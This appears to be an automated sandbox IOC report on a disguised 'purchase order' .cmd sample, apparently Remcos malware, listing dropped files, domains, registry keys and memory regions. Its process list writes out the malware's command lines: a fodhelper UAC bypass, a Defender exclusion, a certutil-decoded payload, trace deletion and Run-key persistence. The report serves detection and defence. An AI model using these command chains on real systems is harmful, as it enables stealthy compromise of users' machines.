IOC Report
Purchase Order is approved26042024.cmd

loading gif

Files

File Path
Type
Category
Malicious
Purchase Order is approved26042024.cmd
Unicode text, UTF-8 text, with very long lines (3004), with CRLF line terminators
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\Public\Kpeyvroh.url
MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF">), ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\Public\Libraries\Kpeyvroh
data
dropped
malicious
C:\Users\Public\Libraries\Kpeyvroh.PIF
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\Public\Libraries\sppsvc.pif
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\Public\alpha.exe
PE32+ executable (console) x86-64, for MS Windows
modified
C:\Users\Public\ger.exe
PE32+ executable (console) x86-64, for MS Windows
modified
C:\Users\Public\kn.exe
PE32+ executable (console) x86-64, for MS Windows
modified
C:\Users\Public\sppsvc.rtf
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\Public\xkn.exe
PE32+ executable (console) x86-64, for MS Windows
modified
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xkn.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdls2d4n.4lb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3ru4bzt.u0w.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
Chrome Cache Entry: 100
ASCII text, with very long lines (773)
downloaded
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 14 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "
malicious
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
malicious
C:\Windows\System32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
malicious
C:\Windows\System32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
malicious
C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
malicious
C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
malicious
C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
malicious
C:\Windows\System32\fodhelper.exe
"C:\Windows\system32\fodhelper.exe"
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
malicious
C:\Windows\System32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
malicious
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
malicious
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
malicious
C:\Users\Public\Libraries\sppsvc.pif
C:\Users\Public\Libraries\sppsvc.pif
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
malicious
C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF
malicious
C:\Users\Public\Libraries\Kpeyvroh.PIF
"C:\Users\Public\Libraries\Kpeyvroh.PIF"
malicious
C:\Users\Public\Libraries\Kpeyvroh.PIF
"C:\Users\Public\Libraries\Kpeyvroh.PIF"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1956,i,11964562257046214624,14274192803590327640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\System32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
C:\Windows\System32\taskkill.exe
taskkill /F /IM SystemSettings.exe
There are 21 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://geoplugin.net/json.gp/C
unknown
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
^www.pentegrasystem.com
malicious
http://geoplugin.net/json.gp
178.237.33.50
malicious
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
unknown
https://login.microsoftonline.com/%s/oauth2/authorize
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
unknown
http://ocsp.sectigo.com0
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
unknown
https://enterpriseregistration.windows.net/EnrollmentServer/key/
unknown
https://login.windows.local
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGNCNsLEGIjCLPFnVdLGYjtbKIHiASmHBA5O7_cfgfeKSfVG961wW18u4XGlNJfozYzsMBcrzcRwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
142.250.64.196
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
http://geoplugin.net/json.gpK0r
unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
142.250.64.196
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop
23.35.153.42
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://%ws/%ws_%ws_%ws/service.svc/%ws
unknown
https://enterpriseregistration.windows.net/EnrollmentServer/device/
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
unknown
http://geoplugin.net/json.gpoft
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://geoplugin.net/json.gpa
unknown
https://sectigo.com/CPS0
unknown
https://login.microsoftonline.com/%s/oauth2/token
unknown
http://geoplugin.net/json.gpthority
unknown
http://geoplugin.net/json.gp2BF
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/Icon
unknown
https://www.google.com/async/newtab_promos
142.250.64.196
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGNGNsLEGIjD9G5xmGH5ri1rv3DQ5wOXVjujAbZEINLE1ZHU1KvNcD8D04QZH5XmP2eIPYJfEfjEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
142.250.64.196
http://geoplugin.net/user
unknown
https://github.com/Pester/Pester
unknown
https://www.google.com/async/ddljson?async=ntp:2
142.250.64.196
http://crl.m
unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
142.250.64.196
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
unknown
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
unknown
https://aka.ms/pscore68
unknown
http://www.pmail.com
unknown
http://ocsp.sectigo.com0C
unknown
https://oneget.org
unknown
https://drive.usercontent.google.com/6
unknown
There are 39 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.pentegrasystem.com
83.137.157.85
malicious
geoplugin.net
178.237.33.50
www.google.com
142.250.64.196
drive.google.com
192.178.50.78
drive.usercontent.google.com
142.250.217.193

IPs

IP
Domain
Country
Malicious
83.137.157.85
www.pentegrasystem.com
Hungary
malicious
192.168.2.5
unknown
unknown
malicious
142.250.64.196
www.google.com
United States
239.255.255.250
unknown
Reserved
178.237.33.50
geoplugin.net
Netherlands
142.250.217.193
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Kpeyvroh
malicious
HKEY_CURRENT_USER_Classes\ms-settings\shell\open\command
NULL
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7
Name
HKEY_CURRENT_USER\SOFTWARE\Rmc-3A6IQD
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-3A6IQD
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-3A6IQD
time

Memdumps

Base Address
Regiontype
Protect
Malicious
2891000
direct allocation
page execute and read and write
malicious
805000
heap
page read and write
malicious
7E9A0000
direct allocation
page read and write
malicious
29A0000
direct allocation
page execute and read and write
malicious
24A6000
direct allocation
page read and write
malicious
7FBA0000
direct allocation
page read and write
malicious
81A000
heap
page read and write
malicious
76D000
heap
page read and write
malicious
21060000
direct allocation
page execute and read and write
malicious
80B000
heap
page read and write
malicious
2841000
direct allocation
page execute and read and write
malicious
1B7CF000
stack
page read and write
malicious
67A000
heap
page read and write
malicious
801000
heap
page read and write
malicious
810000
heap
page read and write
malicious
823000
heap
page read and write
malicious
7EFA0000
direct allocation
page read and write
2842709C000
heap
page read and write
20B7E000
stack
page read and write
7FA30000
direct allocation
page read and write
7EF20000
direct allocation
page read and write
284270BC000
heap
page read and write
339AF000
stack
page read and write
1FD240C0000
heap
page read and write
1A97E000
stack
page read and write
7EB00000
direct allocation
page read and write
215EF138000
heap
page read and write
83C000
heap
page read and write
30EB87E000
stack
page read and write
1E50ACFE000
heap
page read and write
7FF789C0F000
unkown
page read and write
1A0BF42C000
heap
page read and write
304D35B000
stack
page read and write
7FF789C1D000
unkown
page readonly
7A1000
heap
page read and write
30EBCBB000
stack
page read and write
7FCC0000
direct allocation
page read and write
1FD2273B000
heap
page read and write
7FF789C19000
unkown
page readonly
7F0E0000
direct allocation
page read and write
15A30EF0000
trusted library allocation
page read and write
15A34215000
trusted library allocation
page read and write
7EF10000
direct allocation
page read and write
28427086000
heap
page read and write
1C600810000
heap
page read and write
284270B8000
heap
page read and write
2A4C84C5000
heap
page read and write
28427240000
heap
page read and write
2453000
heap
page read and write
30EB2C3000
stack
page read and write
BEB199E000
stack
page read and write
7FF789BC1000
unkown
page execute read
20F1E000
stack
page read and write
7FF789C01000
unkown
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
1A71D000
direct allocation
page read and write
7FF789C1D000
unkown
page readonly
7FF789BF2000
unkown
page readonly
2BF6F490000
heap
page read and write
7FF789C19000
unkown
page readonly
215EF138000
heap
page read and write
74B000
heap
page read and write
7FF789BF2000
unkown
page readonly
284270B4000
heap
page read and write
7DC000
heap
page read and write
7FF789C1C000
unkown
page write copy
17C1ED27000
heap
page read and write
7FF789BC1000
unkown
page execute read
7FF789C0F000
unkown
page read and write
22C67470000
heap
page read and write
B90000
heap
page read and write
652000
heap
page read and write
C1CFAFF000
stack
page read and write
660000
heap
page read and write
7F03F000
direct allocation
page read and write
7FF789BC1000
unkown
page execute read
28428D00000
heap
page read and write
265FDB50000
heap
page read and write
9B000
stack
page read and write
293023E0000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
9B000
stack
page read and write
7FF848FF2000
trusted library allocation
page read and write
BEB189B000
stack
page read and write
7FF789BC1000
unkown
page execute read
15A3468F000
trusted library allocation
page read and write
1C6B9150000
heap
page read and write
7FF789BC1000
unkown
page execute read
1A0BF3C0000
heap
page read and write
7FF789BF2000
unkown
page readonly
15E7DFC0000
heap
page read and write
55A000
unkown
page read and write
22D0000
direct allocation
page read and write
2450000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
30EB77C000
stack
page read and write
7FF789BC0000
unkown
page readonly
207B1000
direct allocation
page read and write
7FF789BF2000
unkown
page readonly
5B0000
heap
page read and write
265FF5D3000
heap
page read and write
7FF789BC0000
unkown
page readonly
15A30F37000
heap
page execute and read and write
45A000
unkown
page read and write
1A0BF448000
heap
page read and write
7FF849000000
trusted library allocation
page execute and read and write
7FF789BC0000
unkown
page readonly
D3B9FF000
stack
page read and write
7FF789C09000
unkown
page read and write
1E508890000
heap
page read and write
7FF789BFD000
unkown
page write copy
7FF849110000
trusted library allocation
page read and write
7F150000
direct allocation
page read and write
353C87E000
stack
page read and write
1C10F880000
heap
page read and write
2323000
direct allocation
page read and write
15A4AED0000
heap
page read and write
7EBBF000
direct allocation
page read and write
1FD2275B000
heap
page read and write
7FF789BC1000
unkown
page execute read
7BB000
heap
page read and write
7FF789C0F000
unkown
page read and write
2105F000
stack
page read and write
7FF789C01000
unkown
page read and write
1F831CA7000
heap
page read and write
30EBDBB000
stack
page read and write
7FF789C19000
unkown
page readonly
7748AFC000
stack
page read and write
7BF000
heap
page read and write
7FF789C1D000
unkown
page readonly
7FF789BFD000
unkown
page read and write
7FF789BC0000
unkown
page readonly
1FB5C900000
heap
page read and write
710000
heap
page read and write
7F0E0000
direct allocation
page read and write
1B699000
heap
page read and write
7FF703A06000
unkown
page read and write
7FF655880000
unkown
page readonly
20786000
direct allocation
page read and write
7FF789C1D000
unkown
page readonly
1730D090000
heap
page read and write
1AE7D000
stack
page read and write
7FF789C1C000
unkown
page write copy
15E7E045000
heap
page read and write
7CB000
heap
page read and write
20CCE000
stack
page read and write
5EC9CC000
stack
page read and write
400000
unkown
page readonly
2859C7C000
stack
page read and write
2BF6F764000
heap
page read and write
7FBE5000
direct allocation
page read and write
30EB3CE000
stack
page read and write
7FF789BFD000
unkown
page write copy
1B6BD000
heap
page read and write
2BF6F410000
heap
page read and write
56A000
unkown
page readonly
22C65439000
heap
page read and write
1A0BF7B5000
heap
page read and write
640000
heap
page read and write
1A0BF445000
heap
page read and write
22C67456000
heap
page read and write
2A4C8555000
heap
page read and write
17C1EECC000
heap
page read and write
7FF67DFC8000
unkown
page readonly
8FF000
stack
page read and write
7F360000
direct allocation
page read and write
7FF789BF2000
unkown
page readonly
1D51A240000
heap
page read and write
563000
unkown
page readonly
7F0D0000
direct allocation
page read and write
1B660000
heap
page read and write
22C65370000
heap
page read and write
7FF67DFAA000
unkown
page write copy
7FF789BC1000
unkown
page execute read
7FF789BC1000
unkown
page execute read
19D000
stack
page read and write
1C600AB0000
heap
page read and write
17C1ED1B000
heap
page read and write
7FF789BC1000
unkown
page execute read
22C2000
direct allocation
page read and write
850000
heap
page read and write
7FF67DFB4000
unkown
page write copy
353C55C000
stack
page read and write
1F1FAFD0000
heap
page read and write
230A000
direct allocation
page read and write
46263FF000
stack
page read and write
7FF789C19000
unkown
page readonly
7FF789BC0000
unkown
page readonly
284270BC000
heap
page read and write
1FB5C904000
heap
page read and write
1FD2275B000
heap
page read and write
7F19F000
direct allocation
page read and write
729C7FF000
stack
page read and write
2314000
direct allocation
page read and write
17C1ED17000
heap
page read and write
1F1FAFB0000
heap
page read and write
22C653A0000
heap
page read and write
7F28F000
direct allocation
page read and write
265FDB66000
heap
page read and write
23DC000
stack
page read and write
1A6E3000
direct allocation
page read and write
28CA000
direct allocation
page execute and read and write
1AFEF000
direct allocation
page execute and read and write
7C3000
heap
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
2F10000
heap
page read and write
1F1FB049000
heap
page read and write
1E5087A0000
heap
page read and write
6AE000
stack
page read and write
1E5089E0000
heap
page read and write
7FF789C09000
unkown
page read and write
17C1EE60000
heap
page read and write
24E4000
direct allocation
page read and write
7FF67DFB3000
unkown
page read and write
5ECDFF000
stack
page read and write
7FF789C0F000
unkown
page read and write
1E508899000
heap
page read and write
3240000
heap
page read and write
7F1F0000
direct allocation
page read and write
7FF67DF4E000
unkown
page readonly
7FF849040000
trusted library allocation
page read and write
1BA1B000
direct allocation
page execute and read and write
790000
heap
page read and write
7FF6558D4000
unkown
page readonly
265FDB9B000
heap
page read and write
7FF789BC1000
unkown
page execute read
45A000
unkown
page write copy
22C65260000
heap
page read and write
1E50A706000
heap
page read and write
7FF789C19000
unkown
page readonly
1FD24600000
trusted library allocation
page read and write
2BF6F4B8000
heap
page read and write
2BFE000
stack
page read and write
1C6008E0000
heap
page read and write
838000
heap
page read and write
1C10F895000
heap
page read and write
7FF789BF2000
unkown
page readonly
17C1ED49000
heap
page read and write
7FF789BF2000
unkown
page readonly
1C600730000
heap
page read and write
28427400000
heap
page read and write
1B6B4000
heap
page read and write
CD0027C000
stack
page read and write
13AD5AB000
stack
page read and write
7FF848EF6000
trusted library allocation
page execute and read and write
7FC7F000
direct allocation
page read and write
33C2F000
stack
page read and write
71E000
heap
page read and write
7FF67DFB3000
unkown
page read and write
7FF789C19000
unkown
page readonly
304D67D000
stack
page read and write
15A30F30000
heap
page execute and read and write
2520000
direct allocation
page read and write
1A6CD000
direct allocation
page read and write
215EF2E0000
heap
page read and write
1FD2273B000
heap
page read and write
15A4B048000
heap
page read and write
1E50ACFC000
heap
page read and write
15A30F40000
trusted library allocation
page read and write
1AD2F000
stack
page read and write
22C65420000
heap
page read and write
17C1ED00000
heap
page read and write
2A4C8530000
heap
page read and write
2561000
direct allocation
page read and write
7FF67DE30000
unkown
page readonly
7FF789BC0000
unkown
page readonly
7FF67DFC5000
unkown
page write copy
7EF85000
direct allocation
page read and write
15A30F20000
heap
page readonly
1C10FBF4000
heap
page read and write
7FF67DFB8000
unkown
page read and write
1AC2E000
stack
page read and write
7FF789BF2000
unkown
page readonly
15A4AEA8000
heap
page read and write
7F130000
direct allocation
page read and write
2BF6F430000
heap
page read and write
17C1ED14000
heap
page read and write
1D463FF000
stack
page read and write
1B034000
direct allocation
page execute and read and write
1A6F8000
direct allocation
page read and write
1D51A234000
heap
page read and write
15A349D6000
trusted library allocation
page read and write
1D51A180000
heap
page read and write
1B6CA000
heap
page read and write
7FF67DE31000
unkown
page execute read
1C6B9130000
heap
page read and write
7FF789BF2000
unkown
page readonly
28427404000
heap
page read and write
1C6B9465000
heap
page read and write
7EB70000
direct allocation
page read and write
265FDA40000
heap
page read and write
7FF67DFC8000
unkown
page readonly
7FBF0000
direct allocation
page read and write
90E000
stack
page read and write
840000
heap
page read and write
4E90000
heap
page read and write
2A4C8450000
heap
page read and write
1FB5C670000
heap
page read and write
C2F7FC000
stack
page read and write
7FF655890000
unkown
page readonly
15A34608000
trusted library allocation
page read and write
265FF5D0000
heap
page read and write
15A32905000
heap
page read and write
1D51A080000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
2859CFE000
stack
page read and write
353C5DE000
stack
page read and write
293021F4000
heap
page read and write
7A5000
heap
page read and write
1A0BF420000
heap
page read and write
1C10FA70000
heap
page read and write
206DF000
direct allocation
page read and write
1730D474000
heap
page read and write
7FF789BC1000
unkown
page execute read
24F3000
heap
page read and write
BEB191E000
stack
page read and write
77F000
heap
page read and write
1B4AD000
heap
page read and write
2FBD000
heap
page read and write
7FF849060000
trusted library allocation
page read and write
33B2E000
stack
page read and write
7FF789BC1000
unkown
page execute read
1FB5C650000
heap
page read and write
1B000000
remote allocation
page read and write
20DCF000
stack
page read and write
7FF849120000
trusted library allocation
page read and write
15A32763000
trusted library allocation
page read and write
7748CFF000
stack
page read and write
22ED000
direct allocation
page read and write
BB0000
direct allocation
page execute and read and write
215EF440000
heap
page read and write
C2FBFE000
stack
page read and write
665000
heap
page read and write
22C674F1000
heap
page read and write
7FF655890000
unkown
page readonly
22C65426000
heap
page read and write
1A6EA000
direct allocation
page read and write
2859D7E000
stack
page read and write
600000
heap
page read and write
1730D0C0000
heap
page read and write
C0092FF000
stack
page read and write
7FF789BC0000
unkown
page readonly
BE7000
heap
page read and write
720000
heap
page read and write
7F070000
direct allocation
page read and write
7FF789C19000
unkown
page readonly
1730D470000
heap
page read and write
7F110000
direct allocation
page read and write
1C10FBF5000
heap
page read and write
13AD87E000
stack
page read and write
1E50AD48000
heap
page read and write
7FF789C01000
unkown
page read and write
2B0A000
stack
page read and write
7FF67DFBD000
unkown
page readonly
55C000
unkown
page read and write
638000
heap
page read and write
304D77E000
stack
page read and write
1FD2274E000
heap
page read and write
1730D475000
heap
page read and write
15A327B0000
heap
page read and write
7EA9F000
direct allocation
page read and write
FCB31FF000
stack
page read and write
1C602270000
heap
page read and write
7FF789C01000
unkown
page read and write
17C1ED17000
heap
page read and write
1B6CE000
stack
page read and write
827000
heap
page read and write
1AC2E000
stack
page read and write
22C67452000
heap
page read and write
1E5089B0000
heap
page read and write
BD0000
heap
page read and write
B4F000
stack
page read and write
22C6721D000
heap
page read and write
7FF848EC0000
trusted library allocation
page read and write
1F831E90000
heap
page read and write
1FD22758000
heap
page read and write
A3F000
stack
page read and write
1B468000
heap
page read and write
401000
unkown
page execute read
30EB9BF000
stack
page read and write
1A70F000
direct allocation
page read and write
7FF789C0F000
unkown
page read and write
1A6A3000
direct allocation
page read and write
15A349DA000
trusted library allocation
page read and write
1C6B9050000
heap
page read and write
284273D0000
heap
page read and write
265FDB6A000
heap
page read and write
2F7E000
stack
page read and write
1730D0A0000
heap
page read and write
7FF848FCA000
trusted library allocation
page read and write
17C1ED3E000
heap
page read and write
7FC8D000
direct allocation
page read and write
1C6B9460000
heap
page read and write
EA5F0FF000
stack
page read and write
7FF789BFD000
unkown
page write copy
15E7E2C0000
heap
page read and write
30EBA36000
stack
page read and write
1FD22660000
heap
page read and write
2276000
direct allocation
page read and write
7FF789BC0000
unkown
page readonly
1B7A2000
heap
page read and write
1FD2275B000
heap
page read and write
2BF6F400000
heap
page read and write
28429850000
heap
page read and write
7FF67DE30000
unkown
page readonly
7FF789C01000
unkown
page read and write
284270B9000
heap
page read and write
2BB0000
heap
page read and write
7F282000
direct allocation
page read and write
1C6B9197000
heap
page read and write
1B458000
heap
page read and write
15A32D20000
heap
page execute and read and write
1BA14000
direct allocation
page execute and read and write
1A724000
direct allocation
page read and write
30EBBBE000
stack
page read and write
7FF789BC1000
unkown
page execute read
9FF000
stack
page read and write
1FB5C7A0000
heap
page read and write
22C67424000
heap
page read and write
7FF789C01000
unkown
page read and write
33C34000
heap
page read and write
1C6B9290000
heap
page read and write
BA0000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
30EBC3F000
stack
page read and write
22C67426000
heap
page read and write
7FF789C14000
unkown
page read and write
7FF789C1C000
unkown
page write copy
17C1ED48000
heap
page read and write
7FF789C19000
unkown
page readonly
2311000
direct allocation
page read and write
2BF6F49B000
heap
page read and write
BE0000
heap
page read and write
207AA000
direct allocation
page read and write
FC902FF000
stack
page read and write
45A000
unkown
page read and write
7FF6558D4000
unkown
page readonly
7FF789BF2000
unkown
page readonly
17C1EE33000
heap
page read and write
1FB5C6A7000
heap
page read and write
1E50AD2E000
heap
page read and write
A21717F000
stack
page read and write
2320000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
209FF000
stack
page read and write
7FF789C01000
unkown
page read and write
7FC40000
direct allocation
page read and write
1F1FAFA0000
heap
page read and write
7FF789BC0000
unkown
page readonly
7FC70000
direct allocation
page read and write
2A4C853B000
heap
page read and write
CD002FE000
stack
page read and write
339EE000
stack
page read and write
1AEBE000
stack
page read and write
1B69E000
heap
page read and write
7F150000
direct allocation
page read and write
7EB60000
direct allocation
page read and write
55A000
unkown
page read and write
7E9A0000
direct allocation
page read and write
1FB5C905000
heap
page read and write
1FB5C6C7000
heap
page read and write
7FF789C19000
unkown
page readonly
4B44000
heap
page read and write
7FF789BFD000
unkown
page read and write
800000
heap
page read and write
265FDB9B000
heap
page read and write
7FF789BC0000
unkown
page readonly
7EA70000
direct allocation
page read and write
